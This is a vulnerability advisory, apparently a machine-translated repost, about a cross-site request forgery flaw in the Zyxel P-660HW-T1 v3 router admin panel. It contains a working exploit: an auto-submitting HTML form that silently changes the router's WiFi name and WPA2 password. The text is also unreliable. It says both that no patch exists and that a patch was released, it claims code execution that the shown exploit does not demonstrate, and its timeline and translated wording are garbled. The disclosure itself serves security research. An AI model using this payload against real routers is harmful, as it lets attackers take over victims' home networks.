Zyxel P-660HW-T1 v3 wireless router CSRF Vulnerability

Release date:
Updated on:

Affected Systems:
ZyXEL P-660HW-T1 v3
Description:
--------------------------------------------------------------------------------
Zyxel P-660HW-T1 is a wireless router product.

P-660HW-T1 wireless router Version 3 Management Panel security vulnerability, attackers can exploit this vulnerability to execute arbitrary code on the affected device.
 
<* Source: Mustafa ALTINKAYNAK
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Mustafa ALTINKAYNAK () provides the following test methods:
 
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router-CSRF Vulnerabilities
# Date: 05/22/2014
# Author: Mustafa ALTINKAYNAK
# Vendorhomepage: http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml? T = p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/Fix: Vendor has not provided any fix for this yet
---------------------------

Technical Details
---------------------------
This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.

Disclosure Timeline
---------------------------
05/21/2014 Contacted Vendor
05/22/2014 Vendor Replied
04/22/2014 Vulnerability Explained (No reply already ed)
05/23/2014 Full Disclosure

Exploit Code
---------------------------

Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<Html>
<Body onload = "document. form. submit ();">
<Form action = "http: // 192.168.1.1/Forms/WLAN_General_1"
Method = "POST" name = "form">
<Input type = "hidden" name = "EnableWLAN" value = "on">
<Input type = "hidden" name = "Channel_ID" value = "00000005">
<Input type = "hidden" name = "ESSID" value = "wifi name">
<Input type = "hidden" name = "Security_Sel" value = "00000002">
<Input type = "hidden" name = "SecurityFlag" value = "0">
<Input type = "hidden" name = "wlanstmpsk" value = "123456">
<Input type = "hidden" name = "WLANCfgWPATimer" value = "1800">
<Input type = "hidden" name = "QoS_Sel" value = "00000000">
<Input type = "hidden" name = "sysSubmit" value = "Uygula">
</Form>
</Body>
</Html>

-----------

Mustafa ALTINKAYNAK
Twitter: @ m_altinkaynak Www.mustafaaltinkaynak.com

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
ZyXEL
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml? T = p

This article permanently updates the link address: